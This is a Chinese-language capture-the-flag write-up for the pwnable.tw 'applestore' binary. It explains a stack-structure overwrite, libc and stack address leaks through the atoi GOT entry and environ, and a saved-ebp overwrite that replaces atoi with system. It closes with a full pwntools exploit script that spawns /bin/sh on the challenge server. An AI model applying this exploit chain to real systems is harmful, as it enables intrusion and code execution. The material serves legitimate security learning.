做了这题后对栈的理解又加深了一点
程序保护: 程序逻辑分析: 1.Apple store 列出apple store 的商品 2.add 通过创建一个size为0x20 的chunk来存放需要购买的商品的数据 具体结构如下:
str addr <----- &chunk price next addr before addr
创建完毕后插入以mycart为头节点的双向链表中
3. Cart 通过遍历链表来输出购物车中的商品的信息, 并返回购物车中的商品的总价格
4.checkout 同样会遍历链表来输出商品的信息, 不过在商品总价格为7174时会加入iphone 8, 存放iphone 8 的信息没有存放在堆中, 而是存放在栈中, 也就是v2 的地址(ebp - 0x20) 存放信息的结构如下:
str addr <----- ebp - 20h price unknown(insert时未赋值 before addr
漏洞点: 漏洞点也就存在于存放iphone 8 的结构中 add, delete, cart, checkout 这些函数都是从handler函数中调用的, 所以进入这些函数时栈帧中的ebp 都是一样的, 那么只要关注有哪些可控制的变量在ebp - 0x20附近即可控制iphone 8 的结构 通过观察在add, delete, cart函数中都存在处于ebp - 0x20附近的变量, 并且输入的数据长度可以覆盖iphone 8 的结构体
漏洞利用:
1.首先要做的第一步就是泄露libc地址, cart函数会输出所有商品的信息, 在此之前先通过控制商品的总价格为7174(6 * 199 + 20 * 199), 可以将指向iphone 8 结构的栈地址插入链表中 之后在输入buf的数据时控制iphone 8 的str addr 为atoi函数got表地址即可泄露出atoi 的libc地址
2.泄露出libc地址后考虑如何调用system函数 观察本题开启的保护, 比较直接的想法是覆写got表
想过通过delete函数控制iphone 8的结构中的next addr为system_addr, before_addr 为got_atoi - 8, 的确可以将got_atoi 里的地址覆盖成system函数的地址, 不过之后往system函数的代码中写就不行了, 代码段不可写, 会触发段保护, 退一万步, 即使可写, system函数的代码也被破坏, 同样无法成功调用system函数
想了挺久, 没办法, 去参考别人的想法, 发现可以通过libc中的environ来泄露栈地址, 泄露了栈地址后通过调试算出偏移可以得到delete函数的ebp地址,delete函数中的ebp指向的是handler函数中的ebp ebp -> handler_ebp
可以通过改写handler_ebp 为got_atoi + 0x22来完成对got表的覆写 为什么是got_atoi + 0x22? 从delete函数返回到handler函数中, 还原栈帧的过程中ebp 的值为改写成got_atoi - 0x22, 这样在调用my_read 函数中时可以对got_atoi 进行覆写, 改写了got表后要考虑的就是/bin/sh 的位置, 可以看到atoi 的参数就是刚刚输入的数据, 这时可以输入p32(system) + "|| /bin/sh"或 p32(system) + “;/bin/sh” 来绕过system 调用/bin/sh
EXP:
from pwn import * import struct context(arch='i386', os='linux', log_level='debug') debug = 1 d = 1 if debug == 0: p = process("./applestore") if d == 1: context.terminal = ['tmux', 'splitw', '-h'] gdb.attach(p) else: p = remote("chall.pwnable.tw", 10104) def add(num): p.sendlineafter("> ", str(2)) p.sendlineafter("Device Number> ", str(num)) def delete(ans): p.sendlineafter("> ", str(3)) p.sendlineafter("Item Number> ", ans) def cart(ans): p.sendlineafter("> ", str(4)) p.sendlineafter("Let me check your cart. ok? (y/n) > ", ans) def checkout(ans): p.sendlineafter("> ", str(5)) p.sendlineafter("Let me check your cart. ok? (y/n) > ", ans) for i in range(6): add(1) for i in range(20): add(2) checkout('y') elf = ELF("./applestore") libc = ELF("as_libc_32.so.6") #libc = ELF("/lib/i386-linux-gnu/libc-2.23.so") got_atoi = elf.got['atoi'] print "got_atoi -> " + hex(got_atoi) payload = 'ya' + p32(got_atoi) + 'a'*(0xa - 2 - 4) + p32(0) cart(payload) p.recvuntil("27: ") libc_addr = u32(p.recv(4)) libc_base = libc_addr - libc.symbols['atoi'] system = libc_base + libc.symbols['system'] environ_libc = libc_base + libc.symbols['environ'] print "environ_libc -> " + hex(environ_libc) print "libc_addr -> " + hex(libc_addr) print "libc_base -> " + hex(libc_base) print "system -> " + hex(system) payload = 'ya' + p32(environ_libc) + 'a'*(0xa - 2 - 4) + p32(0) cart(payload) p.recvuntil("27: ") stack = u32(p.recv(4)) print "stack -> " + hex(stack) raw_input() payload = '27' + p32(stack) + p32(0x12345678) payload += p32(got_atoi + 0x22) + p32(stack - 0x100 - 0xc) #payload += p32(got_atoi + 0x22) + p32(stack - (0xff80fa1c - 0xff80f918) - 8) delete(payload) p.sendlineafter("> ", p32(system) + "||/bin/sh") p.interactive()结果:
学到的其它知识点:
atoi 函数只会转化ascii码处于0x30-0x39 的字符
